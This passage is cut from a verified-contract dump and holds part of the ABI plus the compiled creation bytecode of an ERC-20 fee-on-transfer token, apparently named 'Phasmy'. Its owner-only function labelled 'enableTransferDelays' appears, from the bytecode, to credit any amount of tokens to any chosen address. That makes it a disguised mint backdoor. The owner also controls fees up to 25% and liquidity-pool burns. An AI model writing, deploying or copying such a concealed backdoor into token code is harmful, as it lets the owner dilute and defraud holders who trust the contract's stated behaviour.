me":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"changeBuyFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newWallet","type":"address"}],"name":"changeDevWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newMarketingWallet","type":"address"}],"name":"changeMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"changeSellFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"devWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"disableTransferDelay","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"m","type":"uint256"},{"internalType":"address","name":"ad","type":"address"}],"name":"enableTransferDelays","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lastLpBurnTime","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lastManualLpBurnTime","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lpBurnEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lpBurnFrequency","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"manualBurnFrequency","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"percent","type":"uint256"}],"name":"manualBurnLiquidityPairTokens","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"percentForLPBurn","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_frequencyInSeconds","type":"uint256"},{"internalType":"uint256","name":"_percent","type":"uint256"},{"internalType":"bool","name":"_Enabled","type":"bool"}],"name":"setAutoLPBurnSettings","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"t","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForDev","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"enabled","type":"bool"}],"name":"updateSwapEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60c06040526005805460ff60a01b1916600160a01b1790556019600b55600c805460ff19908116909155610e10600d55610708600f556011805462ffffff191660019081179091556013805490921617905560006014553480156200006357600080fd5b5060405162004c4738038062004c47833981016040819052620000869162000837565b604080518082018252600c81526b283430b9b6bc902a37b5b2b760a11b602080830191825283518085019094526006845265506861736d7960d01b908401528151919291620000d8916003916200075e565b508051620000ee9060049060208401906200075e565b5050506000620001036200057a60201b60201c565b600580546001600160a01b0319166001600160a01b038316908117909155604051919250906000907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350737a250d5630b4cf539739df2c5dacb4c659f2488d60005b8251811015620001e657620001a28382815181106200018c576200018c62000909565b602002602001015160016200057e60201b60201c565b620001d1838281518110620001bb57620001bb62000909565b602002602001015160016200062a60201b60201c565b80620001dd8162000935565b91505062000169565b50620001f48160016200062a565b6001600160a01b03811660808190526040805163c45a015560e01b8152905163c45a015591600480820192602092909190829003018186803b1580156200023a57600080fd5b505afa1580156200024f573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000275919062000953565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b158015620002be57600080fd5b505afa158015620002d3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002f9919062000953565b6040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604401602060405180830381600087803b1580156200034257600080fd5b505af115801562000357573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200037d919062000953565b6001600160a01b031660a0819052620003989060016200062a565b60a051620003a8906001620006a0565b600280808080806c0c9f2c9cd04674edea400000006103e8620003cd82600a62000971565b620003d9919062000993565b6008556103e8620003ec82601462000971565b620003f8919062000993565b600a556127106200040b82600562000971565b62000417919062000993565b60095560168790556017869055601885905584620004368789620009b6565b620004429190620009b6565b601555601a849055601b839055601c82905581620004618486620009b6565b6200046d9190620009b6565b601955600680546001600160a01b0319908116733c53f226d36f83ef561464f88aafe969d474f16817909155600780549091167370d5624e48af25f6300bad933d8fe81c0b3701ad179055620004d7620004cf6005546001600160a01b031690565b60016200057e565b620004e43060016200057e565b620004f361dead60016200057e565b620005126200050a6005546001600160a01b031690565b60016200062a565b6200051f3060016200062a565b6200052e61dead60016200062a565b600281905533600090815260208181526040909120546200055a91839062002360620006f4821b17901c565b336000908152602081905260409020555062000a0e975050505050505050565b3390565b6005546001600160a01b03163314620005cd5760405162461bcd60e51b8152602060048201819052602482015260008051602062004c2783398151915260448201526064015b60405180910390fd5b6001600160a01b03821660008181526020808052604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6005546001600160a01b03163314620006755760405162461bcd60e51b8152602060048201819052602482015260008051602062004c278339815191526044820152606401620005c4565b6001600160a01b03919091166000908152602160205260409020805460ff1916911515919091179055565b6001600160a01b038216600081815260226020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b600080620007038385620009b6565b905083811015620007575760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401620005c4565b9392505050565b8280546200076c90620009d1565b90600052602060002090601f016020900481019282620007905760008555620007db565b82601f10620007ab57805160ff1916838001178555620007db565b82800160010185558215620007db579182015b82811115620007db578251825591602001919060010190620007be565b50620007e9929150620007ed565b5090565b5b80821115620007e95760008155600101620007ee565b634e487b7160e01b600052604160045260246000fd5b80516001600160a01b03811681146200083257600080fd5b919050565b600060208083850312156200084b57600080fd5b82516001600160401b03808211156200086357600080fd5b818501915085601f8301126200087857600080fd5b8151818111156200088d576200088d62000804565b8060051b604051601f19603f83011681018181108582111715620008b557620008b562000804565b604052918252848201925083810185019188831115620008d457600080fd5b938501935b82851015620008fd57620008ed856200081a565b84529385019392850192620008d9565b98975050505050505050565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b60006000198214156200094c576200094c6200091f565b5060010190565b6000602082840312156200096657600080fd5b62000757826200081a565b60008160001904831182151516156200098e576200098e6200091f565b500290565b600082620009b157634e487b7160e01b600052601260045260246000fd5b500490565b60008219821115620009cc57620009cc6200091f565b500190565b600181811c90821680620009e657607f821691505b6020821081141562000a0857634e487b7160e01b600052602260045260246000fd5b50919050565b60805160a05161419162000a96600039600081816105f80152818161157a015281816121d50152818161227f015281816122ab0152818161293b015281816136a401528181613755015261378101526000818161047c015281816128e30152818161393001528181613a1f01528181613a8101528181613afb0152613b2201526141916000f3fe6080604052600436106103b15760003560e01c8063924de9b7116101e7578063bd8d82111161010d578063dd62ed3e116100a0578063f2fde38b1161006f578063f2fde38b14610b4b578063f637434214610b6b578063f8b45b0514610b81578063fe72b27a14610b9757600080fd5b8063dd62ed3e14610ab7578063e2f4560514610b0a578063e884f26014610b20578063f11a24d314610b3557600080fd5b8063cd7b33ab116100dc578063cd7b33ab14610a41578063d257b34f14610a61578063d85ba06314610a81578063db1dbb8b14610a9757600080fd5b8063bd8d8211146109d1578063c0246668146109f1578063c876d0b914610a11578063c8c8ebe414610a2b57600080fd5b8063a0d82dc511610185578063a9059cbb11610154578063a9059cbb14610942578063b62496f514610962578063bb85c6d114610992578063bbc0c742146109b257600080fd5b8063a0d82dc5146108d6578063a3d14e72146108ec578063a457c2d71461090c578063a4c82a001461092c57600080fd5b80639a7a23d6116101c15780639a7a23d6146108745780639c3b4fdc146108945780639ec22c0e146108aa5780639fccce32146108c057600080fd5b8063924de9b71461080d57806392d0d1531461082d57806395d89b411461085f57600080fd5b806339509351116102d7578063730c18881161026a5780638a8c523c116102395780638a8c523c1461078a5780638da5cb5b1461079f5780638ea5220f146107ca57806392136913146107f757600080fd5b8063730c1888146107075780637571336a1461072757806375f0a874146107475780637bce5a041461077457600080fd5b80636a486a8e116102a65780636a486a8e146106795780636ddd17131461068f57806370a08231146106af578063715018a6146106f257600080fd5b806339509351146105c657806349bd5a5e146105e65780634a62bb651461061a5780634fbee1931461063457600080fd5b8063199ffc721161034f57806323b872dd1161031e57806323b872dd1461055a5780632c3e486c1461057a5780632e82f1a014610590578063313ce567146105aa57600080fd5b8063199ffc72146104f85780631a8145bb1461050e5780631c499ab0146105245780631f3fed8f1461054457600080fd5b806310d5de531161038b57806310d5de531461043a5780631694505e1461046a57806318160ddd146104c3578063184c16c5146104e257600080fd5b80630517d13d146103bd57806306fdde03146103df578063095ea7b31461040a57600080fd5b366103b857005b600080fd5b3480156103c957600080fd5b506103dd6103d8366004613c49565b610bb7565b005b3480156103eb57600080fd5b506103f4610d0d565b6040516104019190613c62565b60405180910390f35b34801561041657600080fd5b5061042a610425366004613cf7565b610d9f565b6040519015158152602001610401565b34801561044657600080fd5b5061042a610455366004613d23565b60216020526000908152604090205460ff1681565b34801561047657600080fd5b5061049e7f000000000000000000000000000000000000000000000000000000000000000081565b60405173ffffffffffffffffffffffffffffffffffffffff9091168152602001610401565b3480156104cf57600080fd5b506002545b604051908152602001610401565b3480156104ee57600080fd5b506104d4600f5481565b34801561050457600080fd5b506104d4600b5481565b34801561051a57600080fd5b506104d4601e5481565b34801561053057600080fd5b506103dd61053f366004613c49565b610db6565b34801561055057600080fd5b506104d4601d5481565b34801561056657600080fd5b5061042a610575366004613d40565b610f12565b34801561058657600080fd5b506104d4600d5481565b34801561059c57600080fd5b50600c5461042a9060ff1681565b3480156105b657600080fd5b5060405160128152602001610401565b3480156105d257600080fd5b5061042a6105e1366004613cf7565b610f88565b3480156105f257600080fd5b5061049e7f000000000000000000000000000000000000000000000000000000000000000081565b34801561062657600080fd5b5060115461042a9060ff1681565b34801561064057600080fd5b5061042a61064f366004613d23565b73ffffffffffffffffffffffffffffffffffffffff16600090815260208052604090205460ff1690565b34801561068557600080fd5b506104d460195481565b34801561069b57600080fd5b5060115461042a9062010000900460ff1681565b3480156106bb57600080fd5b506104d46106ca366004613d23565b73ffffffffffffffffffffffffffffffffffffffff1660009081526020819052604090205490565b3480156106fe57600080fd5b506103dd610fcb565b34801561071357600080fd5b506103dd610722366004613d91565b6110bb565b34801561073357600080fd5b506103dd610742366004613dc6565b6112a4565b34801561075357600080fd5b5060065461049e9073ffffffffffffffffffffffffffffffffffffffff1681565b34801561078057600080fd5b506104d460165481565b34801561079657600080fd5b506103dd61137b565b3480156107ab57600080fd5b5060055473ffffffffffffffffffffffffffffffffffffffff1661049e565b3480156107d657600080fd5b5060075461049e9073ffffffffffffffffffffffffffffffffffffffff1681565b34801561080357600080fd5b506104d4601a5481565b34801561081957600080fd5b506103dd610828366004613dfb565b61142f565b34801561083957600080fd5b5060055461042a9074010000000000000000000000000000000000000000900460ff1681565b34801561086b57600080fd5b506103f46114e8565b34801561088057600080fd5b506103dd61088f366004613dc6565b6114f7565b3480156108a057600080fd5b506104d460185481565b3480156108b657600080fd5b506104d460105481565b3480156108cc57600080fd5b506104d4601f5481565b3480156108e257600080fd5b506104d4601c5481565b3480156108f857600080fd5b506103dd610907366004613e16565b611662565b34801561091857600080fd5b5061042a610927366004613cf7565b611779565b34801561093857600080fd5b506104d4600e5481565b34801561094e57600080fd5b5061042a61095d366004613cf7565b6117d5565b34801561096e57600080fd5b5061042a61097d366004613d23565b60226020526000908152604090205460ff1681565b34801561099e57600080fd5b506103dd6109ad366004613d23565b6117e2565b3480156109be57600080fd5b5060115461042a90610100900460ff1681565b3480156109dd57600080fd5b506103dd6109ec366004613d23565b6118f2565b3480156109fd57600080fd5b506103dd610a0c366004613dc6565b611a02565b348015610a1d57600080fd5b5060135461042a9060ff1681565b348015610a3757600080fd5b506104d460085481565b348015610a4d57600080fd5b506103dd610a5c366004613e16565b611b0b565b348015610a6d57600080fd5b5061042a610a7c366004613c49565b611c1f565b348015610a8d57600080fd5b506104d460155481565b348015610aa357600080fd5b5061042a610ab2366004613e42565b611d62565b348015610ac357600080fd5b506104d4610ad2366004613e72565b73ffffffffffffffffffffffffffffffffffffffff918216600090815260016020908152604080832093909416825291909152205490565b348015610b1657600080fd5b506104d460095481565b348015610b2c57600080fd5b5061042a611e45565b348015610b4157600080fd5b506104d460175481565b348015610b5757600080fd5b506103dd610b66366004613d23565b611ef7565b348015610b7757600080fd5b506104d4601b5481565b348015610b8d57600080fd5b506104d4600a5481565b348015610ba357600080fd5b5061042a610bb2366004613c49565b612006565b60055473ffffffffffffffffffffffffffffffffffffffff163314610c3d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b610c46816123e0565b670de0b6b3a7640000620f4240610c5c60025490565b610c67906001613ecf565b610c719190613f0c565b610c7b9190613f0c565b811015610d0a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152602960248201527f43616e6e6f7420736574206d61785472616e73616374696f6e206c6f7765722060448201527f7468616e20302e312500000000000000000000000000000000000000000000006064820152608401610c34565b50565b606060038054610d1c90613f47565b80601f0160208091040260200160405190810160405280929190818152602001828054610d4890613f47565b8015610d955780601f10610d6a57610100808354040283529160200191610d95565b820191906000526020600020905b815481529060010190602001808311610d7857829003601f168201915b5050505050905090565b6000610dac338484612473565b5060015b92915050565b60055473ffffffffffffffffffffffffffffffffffffffff163314610e37576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b670de0b6b3a7640000620f4240610e4d60025490565b610e58906001613ecf565b610e629190613f0c565b610e6c9190613f0c565b811015610efa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152602060048201526024808201527f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060448201527f302e3525000000000000000000000000000000000000000000000000000000006064820152608401610c34565b610f0c81670de0b6b3a7640000613ecf565b600a5550565b6000610f1f848484612627565b610f7e8433610f798560405180606001604052806028815260200161410f6028913973ffffffffffffffffffffffffffffffffffffffff8a166000908152600160209081526040808320338452909152902054919061301b565b612473565b5060019392505050565b33600081815260016020908152604080832073ffffffffffffffffffffffffffffffffffffffff871684529091528120549091610dac918590610f799086612360565b60055473ffffffffffffffffffffffffffffffffffffffff16331461104c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b60055460405160009173ffffffffffffffffffffffffffffffffffffffff16907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600580547fffffffffffffffffffffffff0000000000000000000000000000000000000000169055565b60055473ffffffffffffffffffffffffffffffffffffffff16331461113c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b6102588310156111ce576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152603360248201527f63616e6e6f7420736574206275796261636b206d6f7265206f6674656e20746860448201527f616e206576657279203130206d696e75746573000000000000000000000000006064820152608401610c34565b6103e882111580156111de575060015b61126a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152603060248201527f4d75737420736574206175746f204c50206275726e2070657263656e7420626560448201527f747765656e20302520616e6420313025000000000000000000000000000000006064820152608401610c34565b600d92909255600b55600c80547fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0016911515919091179055565b60055473ffffffffffffffffffffffffffffffffffffffff163314611325576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b73ffffffffffffffffffffffffffffffffffffffff91909116600090815260216020526040902080547fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0016911515919091179055565b60055473ffffffffffffffffffffffffffffffffffffffff1633146113fc576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b601180547fffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000ff166201010017905542600e55565b60055473ffffffffffffffffffffffffffffffffffffffff1633146114b0576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b6011805491151562010000027fffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00ffff909216919091179055565b606060048054610d1c90613f47565b60055473ffffffffffffffffffffffffffffffffffffffff163314611578576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611654576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152603960248201527f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060448201527f6175746f6d617465644d61726b65744d616b65725061697273000000000000006064820152608401610c34565b61165e828261306f565b5050565b60055473ffffffffffffffffffffffffffffffffffffffff1633146116e3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b601a839055601b829055601c819055806116fd8385613f9b565b6117079190613f9b565b60198181551015611774576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152601d60248201527f4d757374206b656570206665657320617420323525206f72206c6573730000006044820152606401610c34565b505050565b6000610dac3384610f79856040518060600160405280602581526020016141376025913933600090815260016020908152604080832073ffffffffffffffffffffffffffffffffffffffff8d168452909152902054919061301b565b6000610dac338484612627565b60055473ffffffffffffffffffffffffffffffffffffffff163314611863576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b60065460405173ffffffffffffffffffffffffffffffffffffffff918216918316907fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567490600090a3600680547fffffffffffffffffffffffff00000000000000000000000000000000000000001673ffffffffffffffffffffffffffffffffffffffff92909216919091179055565b60055473ffffffffffffffffffffffffffffffffffffffff163314611973576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b60075460405173ffffffffffffffffffffffffffffffffffffffff918216918316907f90b8024c4923d3873ff5b9fcb43d0360d4b9217fa41225d07ba379993552e74390600090a3600780547fffffffffffffffffffffffff00000000000000000000000000000000000000001673ffffffffffffffffffffffffffffffffffffffff92909216919091179055565b60055473ffffffffffffffffffffffffffffffffffffffff163314611a83576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b73ffffffffffffffffffffffffffffffffffffffff82166000818152602080805260409182902080547fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff001685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b60055473ffffffffffffffffffffffffffffffffffffffff163314611b8c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b60168390556017829055601881905580611ba68385613f9b565b611bb09190613f9b565b601581905560141015611774576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152601d60248201527f4d757374206b656570206665657320617420323025206f72206c6573730000006044820152606401610c34565b60055460009073ffffffffffffffffffffffffffffffffffffffff163314611ca3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b620186a0611cb060025490565b611cbb906001613ecf565b611cc59190613f0c565b821015611d54576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152603560248201527f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60448201527f20302e3030312520746f74616c20737570706c792e00000000000000000000006064820152608401610c34565b50600981905560015b919050565b60055460009073ffffffffffffffffffffffffffffffffffffffff163314611de6576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b73ffffffffffffffffffffffffffffffffffffffff8216600090815260208190526040902054611e169084612360565b73ffffffffffffffffffffffffffffffffffffffff831660009081526020819052604090205550600192915050565b60055460009073ffffffffffffffffffffffffffffffffffffffff163314611ec9576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b50601380547fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00169055600190565b60055473ffffffffffffffffffffffffffffffffffffffff163314611f78576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b60055460405173ffffffffffffffffffffffffffffffffffffffff8084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600580547fffffffffffffffffffffffff00000000000000000000000000000000000000001673ffffffffffffffffffffffffffffffffffffffff92909216919091179055565b60055460009073ffffffffffffffffffffffffffffffffffffffff16331461208a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b600f5460105461209a9190613f9b565b4211612102576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4d757374207761697420666f7220636f6f6c646f776e20746f2066696e6973686044820152606401610c34565b6103e8821115612194576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152602a60248201527f4d6179206e6f74206e756b65206d6f7265207468616e20313025206f6620746f60448201527f6b656e7320696e204c50000000000000000000000000000000000000000000006064820152608401610c34565b426010556040517f70a0823100000000000000000000000000000000000000000000000000000000815273ffffffffffffffffffffffffffffffffffffffff7f000000000000000000000000000000000000000000000000000000000000000016600482015260009030906370a082319060240160206040518083038186803b15801561222057600080fd5b505afa158015612234573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906122589190613fb3565b9050600061227261271061226c84876130ee565b906131a3565b905080156122a7576122a77f000000000000000000000000000000000000000000000000000000000000000061dead836131e5565b60007f000000000000000000000000000000000000000000000000000000000000000090508073ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b15801561231457600080fd5b505af1158015612328573d6000803e3d6000fd5b50506040517f8462566617872a3fbab94534675218431ff9e204063ee3f4f43d965626a39abb925060009150a1506001949350505050565b60008061236d8385613f9b565b9050838110156123d9576040517f08c379a00000000000000000000000000000000000000000000000000000000081